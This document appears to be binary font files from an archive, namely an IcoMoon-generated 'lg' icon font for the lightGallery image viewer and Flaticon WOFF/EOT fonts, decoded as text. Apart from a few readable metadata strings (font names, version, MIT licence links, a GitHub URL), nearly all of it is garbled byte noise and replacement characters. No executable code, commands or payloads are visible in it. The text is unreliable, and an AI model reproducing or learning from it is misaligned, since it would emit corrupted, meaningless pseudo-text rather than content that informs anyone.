7!!'33���T���T�VV����V	�UV#%53535373#53!535335353�����T�T�����T���T��T�U����������������������*�3#5#53#553#3#5V�T��T��Ԁ���Ԁ�T��T,�T���T���*�3#5353#53#553#5���TTԀ��T��TUT���T�Ԁ�T��TԀ�Aj+2##5#5353327654'&#"!'5'#"'&547632V*VV*VjP8888PP8888P�@�LhtQQQQttPPBVV*VV�88PP8888PP88�@�"BPPttQQQQthL�Aj+*3#27654'&#"!'5'#"'&547632*��lP8888PP8888P�@�LhtQQQQttPPB+*�88PP8888PP88�@�"BPPttQQQQthL��U3%2#"&5<7%#"&54632%.54632#"&'>3II33I��,4LK5-,K54LK5-��0,�I33KK3�K54L�4LL45K������)"32>54.##"3##5#53546;f��NN��ff��NN��ftI\
OWOO<.I�M��ff��NN��ff��M��6L��L-0EQ����N[n�"32>54.##*10"#"&546;.1*#"&'.54673%##5#53533*#7>'.#7.#*3:7>'f��NN��ff��NN��f-	iu
 ww
	%L4LL4L��4##+)!-

#	�M��ff��NN��ff��M�BDC!
*R
' %
	+##3�MM3MM3;

%#� 

#7����A"32>54.#.'&67&6>&'..7>76'f��NN��ff��NN��f"
 %&*/
$&4
"ZM1,l@R�+C+�M��ff��NN��ff��M��5_Q�@&k>C:6QV")O1!
@-Ka	KL,UC'����T"32>54.##"&'23267.'3267.=.5467.54632>7>7f��NN��ff��NN��f�$FfC)K!"= 1
	
!-
$g=9($
	�M��ff��NN��ff��M�n0bO2&5#
+
,7(9

�K��_<��4���4����������VVU�UU�������
^��H����"l��4�N��	�;/P5
V-
�"�	�		B	1	R		7	
4p	Z3	
�	D�lglghttps://github.com/sachinchoolur/lightGalleryhttps://github.com/sachinchoolur/lightGallerysachinsachinMLTMLThttp://opensource.org/licenses/MIThttp://opensource.org/licenses/MITVersion 1.0Version 1.0lglglglgRegularRegularlglgFont generated by IcoMoon.Font generated by IcoMoon.PK�8FZ��$@$@fonts/Flaticon.woffnu�[���wOFF@$
d�FFTM@�7oOS/2�I`O�]pcmapLGJ�C�cvt �Dgasp@��glyfD8�Y��ϳ�head0/6��}hhea`$��hmtx�^���loca�����maxp� ��name<4�����$post=�Ȍ}H(xc`d`a9ި�6_��@���0���{����`iP�
=xc`d``<�/���L�@T�
��xc`d``a�� �L@�s`�	�~xc`a��8�����ч1����Je�dha``b`ef�FHsMah`P���x�=ƣ� 5HJR�xmʧ�P�z�8z3t�S����X���i���;w}pÃj�
H� {�TK�J��<}a��3h٢�T\�%�p.��$�
��e��[x��7Aз�E�D=�k`�r�p3?#ͼ	�#	c�ި���m[z׶��ү��ZBDt�@r��h	5D****P~���B"���0d���H�
�l�����"�^<��H��<fx�p�
�>.� . ` � �!.!H!l!�!�"�#�$�%%�&D'�()6)d)�)�)�)�*L*�*�+4+j+�,N,�,�xtWe`�H��j��lK�-��8 �v8fm�L3s���{�|�Ǹ�����-=�c���2�Z���-Hj*Rw��+�q0���`�6~��#(��vS�o8"8M�o
KV�|5�ρ#`齠�zA=���7��r=�Ԗ8��YH�8�A����oð;�a7��0�O��c�8�����2SDt��$D4�?n���}�geVeL�!�:Y���v�(D��0���hL.g�88��׿��_߾ꭗ\��KJ&!��Dy�����o��ҷ0�cG���<˱
k0��ơ�/X˽ ��<�G�8�g9����mo�a��<#�ȧn��K�G�ا�e�����<n}3J��:�g?�9Őo�d�
�.���cd�Bv��f�7�)�����?L����M��J�+8�.���}�?�̏sF�_a]Z[Z�9t�2�Zo�M��^w��]]"[�`m�%՜��ˋ����4�ͻ>~�]Wl,�[|�a�1l���ڛ��r��?�X^ڳg���ܼ�.�
j�_zp��dL�_��l�^��c�Љ�3��nw�f+�GC�$N��S�-���p�7SH����V�=h��Q{4܄
 � B�L����Pl�$���S�@�4�[c�5a�G��6��4�\\{��J x���&/�����@���0�M�8JtTo}*�r��5��7��ν��I�� ����F��!Ps�s��������g��|ׁ�2m��UQi_p��Z�(� h3��P¨қ�D�e�b�
._�V�s��l��^��:ᄳ�8��Kt�P_��_���Ǝ�_V�����K���SS���S+e���w濦�}5��(Lڝ8�z�����M�cjY�m@����u@:��KW�~A�Ho7}�&Ҭ��UkF�o?t�C����Y]����r:_q��^�.G���
�3n�� �P.�MW_}%���m��؁R>p�����gD�������|(�/���'u�|~�{��pn!W���|�Lӝ�2Y�Y{��� |&��uR�@17����Tp�����Tpe0�c�Z=������2�����Vds}*��9���Jz�S�!�5�z�}L>3��/��_b�	v/s������������j���[��]��dl�=z�˜�S̰�x�mj
X�B����(>(E��p�2��`X���������{��wz�,���䝝W�p�^�r�,�O>��։I�y"�=9����{y��Uu�nu������o��/?k���V!��ӯ\:��ۖ3���Y�͒�I���[0Ie)�=䜻?q7=��^й��n�t>����X;ݹ�{�6b��A^��v�.?ˡ��,f�)�i�w`C���V��1V& "*ZTֳ4����>��jqe1jLF�^&�1�Ǯ�ѐ|�z1����A�n#��$���d��ck-"�=2��6��{D_�f�=H��
H7�mS���[0�A��
���g;���rc�N��~�4��4�7ifi�As²x�qTo��z��Ե��5�G��S�N�t;�&��m9�Ig#���m�69&(vSԩ��M���d-
=��T�]o�H�*{�5�W��-�CtzäK�"�GC膫��{����r��W��1��j#��'R�p������9ed)@	�)\q�)�q�Zhh��kE�~	�`*)��zIς�B��H��y��%�)ʗp�O��9�g/�s�t޹���w�@�:5�����DŽ�\I�c�>r�b��x���2#L��n�#��T%�P3Sg�뤂s@�
Vq���2�W*ƺ
��9�p"s	���)�|ј3����7&&Vg��K/��<)9|cZ�rg�\]w*��j3��39�N��tq����Q�^I��b8]*�˅�V5�.���3W��_Q8�}��H�wK�ͳGw�8�j)>�/	�%�R��}��S�	��Pd'���>������˟wm��4E�.��x��>_xeT*��m4(L1'�9$�R01�t>�<>��%�Ui�%q8;G|5{]Eªo��ϰ��ك�Q�a_b�b���'8@V'���N����Q��A��l�E��}`{��M�kZ�n
(��~����)j��vN�mз�dz��qҋ����SR[�oB4jE��&��谣;hs���ŀԾƾ4�X�hD):��1@����]��g�]��s����{"l���¸7�w�w�Y�����ewꗖ�p|N��aC]���D�+�<�z;�,�|��陕%�<�����}�<y�*��D�t�㕈�sb��L��w1��̈́�L�r%$�3�Q98W�zZ�lS�0���|�	:WD,
.z¦�2F)���
A���ţnT��z>�a"�R��������}߷�qc�S3|��>���K^�(�f�	g�h&� �T��Q��3�rGw��+g�.�
����_e�`O�
ye��mf`/���	a"�4[��ZTo��mW��R�V�M�	�1�-�l��ժ��ЧY�4)^�jkol-��x����0�x�UzR���0~�H0DEe�n4���Q���
G6�2bjL�V)
0�<��&m���أg�|�@��=��ws�����B�z���‚�}�k4�{�^^�F�7�/��Z�/,4�F-I\�q�\��[[��j:�r��
��̑#�\+��m�'�cR.N҂�H}���GDR*�������-U)�BH�����t���\�����=)�����h�1��Z�b��o�T\h.ȼ\l���u�9!�_��=���_\\�����M:�j��� �Z�uO��.�0�ٳ��]BY��rM㋃����F�q�[�Z��Q�t��m�+����,��bA�zN`;m��~X�WB?^���(G�AA�p�Q޽*��bR��N�>����k��\|��p����P��]�A����S��X����<�.`7�W�{���#`�ԋЁ-8�
p�(c6x���&�(�b��2��8L	�_l{"���H��([wzc
��Ǐw�=^�0t&�߬��9�h5
��`�=f{���&4�ZqdS+	��&�K���VQ���|D(+<$��,���$y8Fm��e�Iu�e�3��ZD!Y���qҵb܅�!�5�&�y۰�����&;={G����ԊeR���@Θ�3y��}�=�'��I帾�:��UK(1/��ŢD��@�y���('d.=�x�G��ͮg�‚���7lk�������G��E�'t�Βp��9�>��k��r�\��Q
��n��t!��K�(������B))�DEkB}���\U�%W��^i1��e�8�R�k��H�9�π���b�cGjr�̈�	o!���c#�v$��B›|�ʽ���G;g���3�z }�z<W(,��.�P�sq�̽
��OD���I'�P��K;]q�
��uIyA:�<�O�Hf��!
i>�ɚ�]�@h��QJ�C���=95=͹Vs����Ǖ?����=�=ӻ�;;<�8��KZ�V�J�2Kvb昃��X>��03'������0�������w�c��.|�]���������c�$�D��$W���T���A��HG=�n�4�_
R9�0������l�Љl��}���l�NŐK�bO��Z�)��n��ӱ��0�P`Sض�ڨ�0��
��q�]'t�vVu�e����
�3�F�
�H��3�5v�OKd�Hw��l�
�-��)�M?TT��_x��,˳�O|}�2��u����~���}�o�'�Bi˪�^�J޹Ќ(5���m4����`��2�-j�
��g�sh&���sLLpa��lk��fG�+"�hv�E(g`]�!���k|�&Y��5�)���R���m�a�kƈ�m,ڱ�QR�nx��4h��#GV��+��t�@{�QH�?�Ⱥģ����*�L�����Mid]�cH2L��r�涟�HrD�iS�|�*�9I�%&�� p��dD��s�8�^�&�%�1�$a͏���Xo�ѳ!GJ��CcC.q�SG�=R�]]�聛��c��O,L�g��L�����0���^����.Fq-�J����d<FEt<&9�u���\~�G�c�Y��RT*�,�M{��'�ˤ|�M��W�ȗ�L�I�Ky��?.�e��\g��[�Â	||NC�?�� �%L���.���Z���x\q����	��o�'�ܦ<O�7�#�@�� �K�{���G�<aY	��?�	��u�u�u�z��y�׭o[�㯬�C
�ڃ��ah\9^"	S��RG\j�̈��G�&���`�>c���؅�H��O���>��z�<�H�Ѯ�M@}Q�Q9�u$���F4
|&Q9
$��]0ݪ��зnw5��C�(Š�b�\2{���}�A��gL�|�]iwd��!*&������dNE	��D�s�惖v�u�/y�����0�R����w�����_�(z��3l_�}��2��c�^63�(D(�jٖ��
U������Bo�"`��
Z�[�[@�a�Џ]�����=�Θ�i�d�q'�*�`<����k�.V�8���M�+DJ8�x�PJ\'ĕ�Yf<`oe,C]�y�q!�?B�]w��&��ŧ�J
��k:7�(%g�a�8������z���WM�!wݧ�x�w�T2.��%	�� !(JH�YlK:�k��3�q��gN6`��醎���w��b'G�6G��d*��D�p|v��:�|ǂˋ�\��η.���nm��G��Y�>h}�i��WGZ�!�n�v�H�Pk�{gP[$�ސe{(���"E�k&O2�GuV�B��X."j�7m#^����f=�;��
Ӈ��L���L�DI0�D{����Ҏ|�]�4�D7�1�L�ߗ�c)I�1.�ۅ�Bl��&���n���e�9�<�<d��b�����o��4�m,�1�TL
�г�R�\z��m��W�>��E0���E
2� %[R~9�}9��Pл{/�O�.���t�Ɋ]4F���|h�ĎA�2�5nVĿ�)�S�@OF=��O=�btAgf�r����<�%���*	�
f�{�B����ǚU�=�o�S�۽��a|F�7��Dvt�sHe���ƣ,2�G��4zt�ҁ��[��|�����G�^gA!�vEj�7P9l(F��Fӵ�v�����J� ���;�r��=@�X�s(���F��Z�`zK7Uk����@�a��HSe �~Mp#6���T;[X���Wmf�y�3��/�0��vFVӡ$�̡�d`72� Lh�a��w:AK0L���b��"t�sR*Q.�@r��x�0a|��KQ�v�`Lه���u���W�XH���y=!�E�!m�@H�or��A%�*�R�~�I$�DJ��D�b�4�OMN�'S	���T��l<��x��4�]ns�1�k��d�e�9!r�Ŭ�጗#$�̈́O�P����3�Q�cB��[���6W�T]t�)z�+л]��d�b��'N�1��Mʚu�\RL
��R�cl���%��k�F��)'��Lf*��Ӯ��E�i���ee���'~3�#�V�J��/g-YMk������n���#F�s�2�d$��$ϾE��n����F��!-V���IgxWg�Ff�>��{ݞQ3�aM�IJ�7�)�ͩ{H�3�eY?�p�l�(��8L����/E�k�Dh��A��0��t�<R6��"�A�}�Wq)���J�=\��)�Ȯ��|qc��*�ȕ�����.�X�C$�˻1�����$\��l�+�ƚ�.A��[]U/^P���(�6g�1GH�P�[�$1yH0�x��F��5v����;�Q�zq���q����,�9�
B�6�NOe�8�o�������]~��hU�%*2�����I��Ǻ�'@̠.
v��H2Vߗ�#a2wӲ��=��`K�@p�������x�w�e��By(;�&��I�x�')L���v,f��T���e��Ġ����q���7<%�X$��E���!�K�Gz�GXοaϲ�mLv���k��Zw"�&ФXCFk�Ȭe�_} �v"���K�Ys/�7�1��H��נp�ؘ@�i�K��9�КJ1�|�1PԐ-���@���iC=-pX��_Ne+S�D�맲���b�l��똪dS^�@����K��j�����i�����/C��L�60C�<{j��.�4I})A��q��
#�NeS��B�狉P��75u��{&�X�����o�z��b?\�jכ���^P[��[*�Dz������&*�e��a�v4���Ő'��r�*�rF�K�aJrKZK���^%k�j���(|�G�ׂ5|w��~ѻ�E6N�2�ٗ��Bc���΅6�÷���r�/`s/�{7QSg�t&��P�i Z��J�T��$��<��*��s���^޹�;��:���G�S�p�v�K����҅�NF�SG�8�I�rfc����DȈRdϭO�+�Ҟ�lݠ��
b���s�wpr/G�moc��Mb���up����>��?:X~1�=�!J��`���K��D�@��ഌg�sL����4NY�`������O��6}��n�0��1����RC�f��v��a�ŭ�<	�Uk��.��\cYl4�v��P"�CE=U�܉���Ӊ��pA��j����@���R�%�B�m:�~�wY����ES���yS\�&E�CD!>n���R눊��|\	���Ǵ��p}�|�J��<&ą|}oE����@#PE��.:���b	˷B�g�k=8�K�wYVM������p9�h�G`Nט™
���C>�J/3���G��~)Ʃ7T��ý�fa�^!�`�&L�Lh��,f���DYW��X�x(�Ap�8hE�'b�T,���)!%%“c�m�%0��KI��G׻akMク<F��NH��
Ӝ���sck��������3����w]���뱏>���?��Z�����w�'���ۛ+��id��K���߇^L`$l7���,�\��A(1���9l�3�v{
� �Z�.]���i�ʌq��K�Zh��J��?�?ʉs��縒��=}n��0F��xG*n:w����6q��z����0�/�<)p�,6�n���1�Ҳn>)��!���B�.m߸�)I�"�x��b��2�����z�o�����V�p�g�������ba%T:�>vg��.�І�3f��ETuG���PLA����\�~��	�s�7~k��@�eYt�;d�
2#�
�h
��!`�k���Ha*���2z�C �Cr��ܣ׋L-����+���Z]EO�?U��47���'��zkm��v���?t<�1�٫T_"���}˫�e�����3\d�g�K{ӵ�Df��^���Y[��UBL�*Y.�+��?��͹�J��z�SN^=]�B�ǯX��m{�s�^%��|�Z��]���>���ٚR�O��f2����R��I̔.^�mV/ZM�B�8�v��
�3��x����zY��m�m�g}p��ϡ;��ΊW��7�&��D;�к7 �w��V}i(��s&��<bҠg[��v�l����i
_�G7��f��c��́�m2�N>I'*trV,�C<r�!�D�`<��AV�+�$��C�*:��.I)5�F��W}�7Ɲ�8�m��C	D@�tФO�a"_E�B�@ԕ���j�a(ܦ�m*u�=J��
��#�S*u%�v�L�Ȱ��A�(�� �	�i�H���� lYh
E�|1���JF�hBl�7+��*�̾_Cad��#�u;Ci�|A�1�@զA�f@!��f�3�*�f��$��6�b�<�
��<D ���*C�z1TJDF������ ��}j;_�7�L"C��Դ�ǒJ��&J%cyHU���ٌk�8f��ḓ;���EJ,>�=�2	��ƒ��y�v�-�װ�Wl�/�&�/c$1V��K�y�ʂ�](�Xr�9Haȍ��?Fv��Q�#Ϗѿ]���]������M���.�dm�Iv���>.)��Rj� �+=Ѕ9���Fڲ~l|�n��ei�[�����{+=�5�1��!S�é	��6&�z�����#��a���P��F�}�Qz
�X/@Mz�둌��@B�
dfB��q=�v �v�n���ݯ�B`�7� Nk�	�����A�	�	�x��9�n"Q?	���U�㟘�^�&��0x�ﶕ`�p|yfV�$��g'�ǃ��*�����v)���!%�C�%���Zi�Ѵ��a��'v۶�y7���d+���OP�@(^IA��� xv\&c�vH*%�R���Ƒ����{'��J2�L�
��IN&)%<�t������XJ�=,��/�&�JegV��}L��O*���0`�1T
\����z��y��h��į��B^J���f�na��K�y3}ck������n?D!Zz�?����4��e��[�i��Β,����gJ`fFV4í:�\<A����o?�-��+��>��LS��2�O��4�J.;k��H�<�a���6�eЊ�'���uv̲��Y���5k?쇮��NZ/������Q��f&��i�� �7�1�v�f4k\BDZc�u���+�Z���-?��-�VBc��CzJ�F^��8�A�!'�	��\q.r�4��0�������:�>�&Pm"��N�;�L���Y��O��W*�l�i�.�WJ���A����8�o*h�Ԝ;��v��OL9���B�.qe��N�-C]�K��^�-��v��XO������. ��1�j�CRߙ��1���N�>��P0�N���6S�y��PK�4B�3�S�¡9Aih[`��[F�dЊph���f�
h˴�1�i�#~ToB3��4�/�N
���Q�{э�Y�U�$/Re�l�CJ��=n��/�Z�L��Vx�XtƸ��@^�.8�)�!7�>
��_�jY'|�(*Q�!H�/�tO�hO�T=F�� l;nڢ.�9QZRR����P�NC(MӅKb�6�T(Z!t������Z�G�@�5����)�l�bJ"Ƕm��u՞-�X��_O1Q�ʈ�n��g���[���'	<�+)����Tt�h''�i�-P���6q�m@��~�����`.wq��-H� De� xи�31������}��F�E梨���7��j�)�r����,���a�:�e�L�y�o�v��ET��C?�ZeQ�g�>/1>?S	/�H�1��ztYI�JCw�e���=a��d���V� l��
���\���Prl�r(u�/�u�a=�5d ��Տ�~���~avj��C�(F�/�$>��0�cd����������;�r�_��Ek4IJw�@\�
��,! P�x}�{�c4�!(�0g7�8(���������~睶��<��Q���E�H��*���n[��?�3��|غ�z��ҡ|R�;���R�֒�a��a�F�huʚ#��r=́yX.�"�����ֻ�p�XL�H����Ȝ�P`2�H�1�&�*�9��������SM�r���R
]�ܴ���������G+�x�R1
>�S �=���ה���u@���}5>� �'��cIW*{,�M��K1����0������?��x�,�p<��u��I�d��K��\���-�b�,��_���o�ɀ���������wt0��9(.!�f����6��q@�v�s|.z�23F�3k�ك4�^1��^�
l��b����� ܬ��6i�-&��u/��խI—wA��w�8~���Lhݦ�V�J�N	�g���~3?Oq`:�'��1�u��đ8��~�yX�8� %�{�}Ks[\2�R�}��8��K!���z
	��޾�۷v��6���
.�+��^E����q�X�(d7k�y�h�N��g

�)Ų�u����iJ,'�|���oe��=0���7��+�>����n����姾�� ܐ�Ê�����Cʀ;̃t��+��̺����{�yZ��yC!4f��{�e��ɳI�բ3��N��y�Z��̰4��{�rhT�(?<O��8�:
���v�r+�|>��ƽ�Q�&4��y�3+3�_:�jhm��8S�c�R�%����c_��K��	�%�w�M����*�P��̇�K������6�ۗ
�
�K��«�}����jm5�.�92A�4.�0��&│+����o0�o0!u;��H��X@�����Y���ӷM.�����;h�>>7ޯ-N���wL>������.�/�9�>d;��s��E�Hֆh���"�pdî��`?��ʸ�sqw̍���	����3S ���?g�gZ��Ʀ���VU�ʑ�D7�O�rm4�6�k���N��å���7���
����_��<�-�����F���~�y[�3|�oC[�
;��
�eN��гW/H��L�Ng��2ௌ�.X�-e��l	����l��Z��R��J��j��ݼ4�A6:�����{��}���Q�2�T��Q��ƴO6�q�e�:c�z�SM�~��)�0�Fԥ(=sC�S�^�3+8�{֞;
�395�h}I2D��VcjJ���B��J�gέ�ި]Z�]-_Z�ؽ>7��G�
)����Y*52cJ�e�R3U����\<~�������z?�c�_X�G�;#�ރ�5(��(�>˲�r?,���*���	���#hs�)A�w	�G̹�|�[�C=�$�3��F��'vO���'�>-�s��]���?Daɽ�Չ�}�y�9�W_��D���_��KFZ�����H��δgF۰��>v��cǿ�GD2�bA�29�/�Y�O�Ư��GT,���3��!Hd}�)\�����Z��PwC/kF�π�Ɉ3b}&�_ �%C�����hJ�O�gò�!�Vt�y���xh{���G�����ԁ�⭋���?~���O��֥�v�vc�̠�C9
�O�8���r�b�*�����{'��q~�9q��j��}�>�8>��ع͛ ��	]���o�����@���A]S�S�X�Q��ګ���8$8l]�;nU>��;��5�ʷ{�z�����oG�o�����\�qK�"E=�z���9��BW�_���t�����~o�����v�3�7�M6
��}�sNC�0:�kQx�l�Q؂+�1�OfL�Vx}d�kú�������t`�j��A�a�'@ۑ��SH`oY?���8m�_#��.���9�Q.2P�C,(W�i�aW�RЪ��'ɜ��}B�����cz�\���6�������o
�+���NJ~vp�V���kwp�� .%����7
W��x�R���x"ԇu�O�R���"��clf�	B��a1ހ�E\F�~�����h)D����>���X|l,�.N��L$�EL8��jT��	�~&H�,��h�֭.Ȩ@>��k���+G�ϴ��!7�*h�-tFۤ@������7��}�n�D�#�(:��@l�*M�pl�j[:�3��w�-}�n_��ٲd?KB���!ٶ�˓(��B,�f{�M�*���������o�r��N�(]�WK7�
�d=�?�?zT�G�oQ&e�Us�o���eP�E�08�~�m��66�pװ��4k^�jX+���0��}0N��wq��I1�y�p����YƄhh'Í,���/uT���&Z^GTZI!�&i�s���FI�j�ϲm��xS�rt!�����DH`��I�]Of���KOU����f�bcè��~kvjj6�|��MA\@̃\�Q��.&�"	�^�,���{$Fb�b'p�X*�ySs�A.r[������F���$\Q�+ok��c�5ĕ0�ʤ5
(��
��ٿ3B���%��^�_��LR�@�aA_Z��޻�}۾0B�n���ߡ��w���7K�I�.��W�r�'�z�����u���,�C�q��շ.��;,$��|:��[8���wOC�]�oa��o�@b����A��F�۬_�П�BѨ1�o/�s�1�>��c�׸I�@�B0�~�.0T٩�|F��<dP����ޑ��Ֆ
|���Gd�*MF�A�HG���G�Я���E�h_����GT,�ǂKGp,��DVOW���t}{�S�1��G�=%��$�M$	q�&��	NR�0In9~�:4�z�[�����>��D)�����w7|�U��y��ot���rE��c׊v.,&�S1��e��V��r���u��m���:V�y)E	W�����
���,_�S��m��E�3[;o���a� �JR�M�f4��\ۗ
�(���m�+)�H�XJhg�*�τ٧�ݛ�vRS�ҷcq��|�S�7�w�����g�3A�%B~ʋ�y���Q����z!<�
���Bx	gf��V�Xl�!��:o2����H7�Ul�Oi�Z��d]l�edS��'@K�#���*0��rGܬp�D/-�<*xh,_���c����Dm�o��Ly	;9^*�'�ӓ�L,�@M 0�����2�G�U�I7X���(F�c*���m?Fj�~r�`2�e܉���Ͷ�n?hJ��J���ք�k>�S�hf����N�Ȋ�ڛ����mF@j�$��E�y)uh0����m�)�+k�g�32��s�Ωm(`�M���S���g��e�¶��j:��ٵ��g�`]�<���6��έ�_���.�_�s��l��w41�>$��F6�n��
�gbn���)D6���@�?�g�����R��j��$
FYi��7V�s3�&���̮߯�Xe�"Dm��|��˗��t��P��T���HB�!�ouY=^�+d��T�����P<�
|�)��r���8�4 ��+��A`/n�ms>���QN�9
��
��
�$82���b����d�N�D:(e:3!r]�1)����2�2{r��_�{4ip�o��]�§�M��C��z)�}�ӿ[6�8Dϣ���.�-��u=���Y.�����pT4�8>���I�a�8bp䤖����[N*�9���a}>��3��T�
@�Ojn3'5߸s~�7���:����x����X�-�	�붻��Өpma������M�Q��P�ȑ��#����#�VKnu�,t�L4f�d��9c�#r�
.k�е[`wJ;hi�q��e��?�~0�k���J%Jy
��H��s�vy�5��5��@�*�}}��.\.����"oʴ56�B�P�碇-@)�:s��!�;�R��E3V]
�����x�\#_ɻ�<����{� ͣ�&r��c�����*qbsE���i��}Ɨk�`�%AF�5xO��~�6|s|�����@��ޠ�B'�
Y��z��[nA7v��ҩ��-�`�
�q��|��
�|
������&B�,���ٻoD����.<,���`0��bċ!�!�;�(h�$.{����f�8e�$E��j���R�[�ʇ�WQ�t`�f�9**r�Щ[λ�_��	�>8���d'�gܔʎܰ��{��56�S&ܸ ���Ҙ�U���r�ֿ��գ��ڧ�/t6��etjs��������Y���V���	q�w�ܭ�!���/��s)�,:ie�;u��I��u�5��ju��p_�n�a�
dzM�v*�
�@�O���K���v�7��_b��^��{�K���ϿC��&B�zge��e�R��H܀���I��ˎ�����l�?�����ݗ�'�B1�.ݛ�_����h��U�A•���n�o���m�:q�
���r%'��4|F+���
�)x���/�d��P�������84�����r$��F|N#Hm#����8�S���+޴
k������	/�Nnp���h?�C/H��M����=�f��mh*=��yY���xʕh��\B]��2�}I��lv�7k����r�V\����f&L����:̹/6R�*��������0�}>&�����)��R��z�� �2�
�������_<� zeb5H_y�!����?F!�ؿ{��+�\�O<��	�д9M"<�*
���\l�U%$B��[G�_����_�������OzL�K+7u/�1��Go��}{���C@����e��<V��p�^�}�ʽ����Tmsx,Ƨ�@����J:���2Xllf�"��SX�ǀXݐ9��Kw<��L�64z$����a��-+κ��[�l��+��>�ⰁN)*�`�p
�?1�M�L������;��A��1G�KT(Y��}���#@�a7�2
�!�3���~�[N�k�A���'��7h����Na���U�x�~��5�7�~�F��D8E���!�-�+m��DD�����=Mxd�cb��<�lo�mۮ��d��~|�A�Z� ��wV'	E2lĨ1�&L�2mƬ9�,Z�lEl՚u6mٶcמ}9v�ԙs.]�v�֝{=y��՛w>}���ן	I)iY9yE%e�v��,�
C᩷��fd�ǀ`}�k�䆷�ٖ�O��#�Ĭh_�3>0kJbⰻc.� ~}a.�ɔ����ř핹&;OJ��*�kh�/4���u��%�3w4�d�߱�D)�v�]R?�Ҵ.�:�@+~�eU�b=^�Ko�X�$�b���l��Z@�%C�Q��d����3=�..H�g�%�k�^R"�G��7~��!�S��+�:R﬛K��f�����:��v4[z�I��y���|A*�7㌂E	�	����(�a//���֐!
%;�t�EK��;G�s	[�@�X�̥&��	�x��n�>8<�T�7��p�eE����ߣ~p��FlX�DB��j��3)�r�h���dX����h�\��G�JX�������j:�.ۃ���UsX�l��t�UK��	��|	uj��+���3�ɯ�=p]���<�Vg,�5�w�߸n�:��������0C��b`�7Lf����w� j,���i����t��]H��-��#��3�p�<q�踙>��3��]a�9��#��/��;�JX��CV�rک���mMs�Z0���1��^v��m�ѵwLQ&����K���xc```d��K�9@�m��a4C�6PK�8FZ��U((fonts/lg.ttfnu�[����0OS/2�`cmap��3o�gasp�glyfZ	+��	�head	t�>X6hhea���$hmtxJQ�TlocavX,maxp�4 name���MT�post ��������3	@����@�@ � ���3�p�����
��
����� ���3�p�������
�����������t���797979V�U#'327654'&#"2#"'&54763*V��eeee��eeee��}}}}��}}}}0VT���ee��eeee��ee}}��}}}}��}}��T��V�U"%27654'&#"2#"'&5476�eeee��eeee��}}}}��}}}}ZUee��eeee��ee}}��}}}}��}}����U�U(=!2#!"'&547633!#!"'&5476%!"3!27654'&#��5%&&%5�U5&%%&5�
$!!)�U5%&��U

�

U%&5�V5&%%&5�5&%���
%&%5�)!!j
�V

�
��*�''7'77*��<��<��<�����<��<��<��UU�"2!2#!#"'&54763�
��

�g�

��

*

�

�

*

+UU�"2#"'&54?!"'&54763!'&54763U
*

��
�g

����
��

�

��+V+
7!!'33���T���T�VV����V	�UV#%53535373#53!535335353�����T�T�����T���T��T�U����������������������*�3#5#53#553#3#5V�T��T��Ԁ���Ԁ�T��T,�T���T���*�3#5353#53#553#5���TTԀ��T��TUT���T�Ԁ�T��TԀ�Aj+2##5#5353327654'&#"!'5'#"'&547632V*VV*VjP8888PP8888P�@�LhtQQQQttPPBVV*VV�88PP8888PP88�@�"BPPttQQQQthL�Aj+*3#27654'&#"!'5'#"'&547632*��lP8888PP8888P�@�LhtQQQQttPPB+*�88PP8888PP88�@�"BPPttQQQQthL��U3%2#"&5<7%#"&54632%.54632#"&'>3II33I��,4LK5-,K54LK5-��0,�I33KK3�K54L�4LL45K������)"32>54.##"3##5#53546;f��NN��ff��NN��ftI\
OWOO<.I�M��ff��NN��ff��M��6L��L-0EQ����N[n�"32>54.##*10"#"&546;.1*#"&'.54673%##5#53533*#7>'.#7.#*3:7>'f��NN��ff��NN��f-	iu
 ww
	%L4LL4L��4##+)!-

#	�M��ff��NN��ff��M�BDC!
*R
' %
	+##3�MM3MM3;

%#� 

#7����A"32>54.#.'&67&6>&'..7>76'f��NN��ff��NN��f"
 %&*/
$&4
"ZM1,l@R�+C+�M��ff��NN��ff��M��5_Q�@&k>C:6QV")O1!
@-Ka	KL,UC'����T"32>54.##"&'23267.'3267.=.5467.54632>7>7f��NN��ff��NN��f�$FfC)K!"= 1
	
!-
$g=9($
	�M��ff��NN��ff��M�n0bO2&5#
+
,7(9

�K��_<��4���4����������VVU�UU�������
^��H����"l��4�N��	�;/P5
V-
�"�	�		B	1	R		7	
4p	Z3	
�	D�lglghttps://github.com/sachinchoolur/lightGalleryhttps://github.com/sachinchoolur/lightGallerysachinsachinMLTMLThttp://opensource.org/licenses/MIThttp://opensource.org/licenses/MITVersion 1.0Version 1.0lglglglgRegularRegularlglgFont generated by IcoMoon.Font generated by IcoMoon.PK�8FZ[zVZ^e^efonts/Flaticon.eotnu�[���^e�d�LP�Z
FlaticonRegular Version 001.000 Flaticon
�PFFTM�7od�OS/2O�]pX`cmap�C�lJcvt D�gasp��d�glyf�ϳ�hY�head��}�6hhea��$hmtx����loca����maxp��8 name���$^�post�}H(_��
Z�_<��I���I���������.��T�@.��LfGLf��PfEd� �O���.�C ���i��2i@2��@@!����&��0
��0��F*v6��v�0D( �O�� �����D****P~���B"���0d���H�
�l�����"�^<��H��<fx�p�
�>.� . ` � �!.!H!l!�!�"�#�$�%%�&D'�()6)d)�)�)�)�*L*�*�+4+j+�,N,�,��U.�/<��2��<��2�/<��2��<��233'3#�wffU��3(X"/&4?62762��		�	��	>�		�������#"/#"&462"264�{5AVyy�y0_YYY�%y�yyVK:Z~ZZ~���%%2#!"&463"&463!2#2#!"&463��4��4
f
�i����7"/&4?62Ͽ����	��	����
%"'&546�

�g
������*2"'&'#".54622654&"327#"&46264&"j�N0$8P8&4&����].)
04j��O6%%6%��j3
&$(88(&))&]�����Ԗ��%6%%6�����5t��%01#"#&'&'&'&76?6227626/&"#"'*1&'&'&'&'05&7567076/.'&'5&"2327676.>"#"'&'&##"'.'.>�;%*5bH9%(
)0")6;%		3-	%
6C\0%
�
4L	 �
pM
V}�<)
0UDF-#%
)3"�;	%!7

	%'AAP-	
8
	L4
+ a
Mp

}2����3;F2"'.'&'&'&54654&"0167567470&2"&42654.#"��x	1�
HU	zg�g,tt,�lLLlLXT;/*;�xUrh:p0UwIggIg``g�MkMMk�<*/<S1�7"/&4?62762�� \� ��9�!]�!����� %2#".546;27>�`�~K^+B2:,p^K~�`/-91C,i����%"/&4?'&4?62������	��	)W%"/"/&4?62�	��	�j��������7#"'&5#"/'.5&7%�V96;���
�HO�	�uM	�-�@����2"'.54264&"��q&0>

>0&�X??X?�qO(^HK		KH^(O�?X??X���2"&42>54&""/&462�������2U1k�kkew��������1U2Lkk�kCw2����
